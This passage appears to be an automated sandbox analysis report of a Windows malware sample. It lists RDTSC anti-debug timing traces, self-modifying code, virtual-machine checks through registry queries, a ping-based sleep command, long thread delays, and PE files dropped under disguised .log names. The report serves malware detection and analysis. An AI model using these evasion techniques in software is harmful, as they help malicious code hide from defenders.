Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6AAF4 second address: F6AAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6AAFD second address: F6ABBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8C7D0F0866h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F8C7D0F0868h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov bh, EBh 0x00000029 push dword ptr fs:[00000000h] 0x00000030 or dword ptr [ebp+1244AB6Fh], eax 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007F8C7D0F0868h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 mov edi, dword ptr [ebp+122D2EF8h] 0x0000005d cld 0x0000005e mov eax, dword ptr [ebp+122D004Dh] 0x00000064 mov ebx, dword ptr [ebp+122D2BB3h] 0x0000006a jmp 00007F8C7D0F0879h 0x0000006f push FFFFFFFFh 0x00000071 mov edi, dword ptr [ebp+122D26DBh] 0x00000077 nop 0x00000078 jmp 00007F8C7D0F0879h 0x0000007d push eax 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007F8C7D0F0874h 0x00000085 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6ABBE second address: F6ABC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8C7D0F21C6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6ABC8 second address: F6ABCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6D972 second address: F6D9D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jo 00007F8C7D0F21C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F8C7D0F21C8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+12458855h], eax 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F8C7D0F21C8h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000016h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push ecx 0x00000053 pushad 0x00000054 popad 0x00000055 pop ecx 0x00000056 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6D9D4 second address: F6D9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6BB8D second address: F6BBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8C7D0F21CFh 0x0000000e rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6BBA5 second address: F6BBAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8C7D0F0866h 0x0000000a rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6FD68 second address: F6FD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6FD74 second address: F6FD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6DAFA second address: F6DB84 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C7D0F21C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bl, DDh 0x00000015 push ebx 0x00000016 sub dword ptr [ebp+122D1C75h], ecx 0x0000001c pop edi 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov eax, dword ptr [ebp+122D0421h] 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F8C7D0F21C8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov dword ptr [ebp+124585B2h], esi 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push ebp 0x0000004f call 00007F8C7D0F21C8h 0x00000054 pop ebp 0x00000055 mov dword ptr [esp+04h], ebp 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc ebp 0x00000062 push ebp 0x00000063 ret 0x00000064 pop ebp 0x00000065 ret 0x00000066 clc 0x00000067 nop 0x00000068 jmp 00007F8C7D0F21CDh 0x0000006d push eax 0x0000006e pushad 0x0000006f jnc 00007F8C7D0F21C8h 0x00000075 push eax 0x00000076 push edx 0x00000077 push edx 0x00000078 pop edx 0x00000079 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6FD78 second address: F6FD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6FD83 second address: F6FE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F8C7D0F21C8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 mov bh, ah 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F8C7D0F21C8h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 jmp 00007F8C7D0F21D6h 0x00000046 mov ebx, edi 0x00000048 xchg eax, esi 0x00000049 push ecx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F8C7D0F21D6h 0x00000051 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F6FE0A second address: F6FE29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8C7D0F086Ah 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F8C7D0F0866h 0x0000001a rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F70DA5 second address: F70E0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F8C7D0F21C8h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 call 00007F8C7D0F21D7h 0x00000018 mov ebx, dword ptr [ebp+122D1E13h] 0x0000001e pop ebx 0x0000001f push 00000000h 0x00000021 jmp 00007F8C7D0F21D8h 0x00000026 push 00000000h 0x00000028 or bx, 054Bh 0x0000002d push eax 0x0000002e pushad 0x0000002f jne 00007F8C7D0F21C8h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F72EFD second address: F72F0B instructions: 0x00000000 rdtsc 0x00000002 je 00007F8C7D0F0866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F73FD9 second address: F73FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F76667 second address: F766AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a sub dword ptr [ebp+122D2974h], esi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F8C7D0F0868h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c js 00007F8C7D0F0866h 0x00000032 sbb di, C995h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d push ecx 0x0000003e pop ecx 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F71093 second address: F71098 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F70081 second address: F70086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F731F5 second address: F731F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F731F9 second address: F731FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F7430B second address: F7431D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F8C7D0F21C6h 0x00000012 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F767B0 second address: F767B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F767B4 second address: F767C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F79E1C second address: F79E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F81B8A second address: F81BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C7D0F21D2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F81BA0 second address: F81BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F81BAA second address: F81BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F812EC second address: F812F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F812F0 second address: F812F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F8146B second address: F81471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F81471 second address: F8147A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\DBFIEHDHII.exe	RDTSC instruction interceptor: First address: F8147A second address: F8147E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D3F750 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F6A9F8 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Special instruction interceptor: First address: DAEB25 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Special instruction interceptor: First address: FE841D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: E3EB25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 107841D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Special instruction interceptor: First address: 238A94 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Special instruction interceptor: First address: 3D4AC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Special instruction interceptor: First address: 466DCF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Special instruction interceptor: First address: 62F750 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Special instruction interceptor: First address: 85A9F8 instructions caused by: Self-modifying code

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Memory allocated: 2A70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Memory allocated: 1AC20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Memory allocated: 2FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Memory allocated: 3170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Memory allocated: 5170000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Memory allocated: C80000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Memory allocated: 1A760000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Documents\DBFIEHDHII.exe

Code function: 9_2_052C032D rdtsc

9_2_052C032D

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 599867
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 598266
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597912
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597547
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597422
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597309
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597188
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 597078
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596966
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596857
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596735
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596610
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596485
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596372
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596250
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596141
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 596028
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595921
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595779
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595527
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595380
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595259
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 595094
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594982
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594875
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594766
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594625
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594516
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594406
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594297
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594188
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 594078
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593969
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593859
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593750
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593641
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593531
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593422
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593311
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593203
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 593094
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 592980
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Thread delayed: delay time: 592747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3078
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Window / User API: threadDelayed 6299
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Window / User API: threadDelayed 3419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 365

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pXgQVFeT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WDUsXAjy.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cLzjLovK.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KhRLcxhs.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TNeBQEiF.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NjDuyglo.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rYNynbxj.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XXhkisgW.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gmoIHdog.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cvxRAgnn.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YUJsDsvR.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZoAIeOtr.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yyQNbzJv.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aINBpFrP.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FwENDODk.log	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
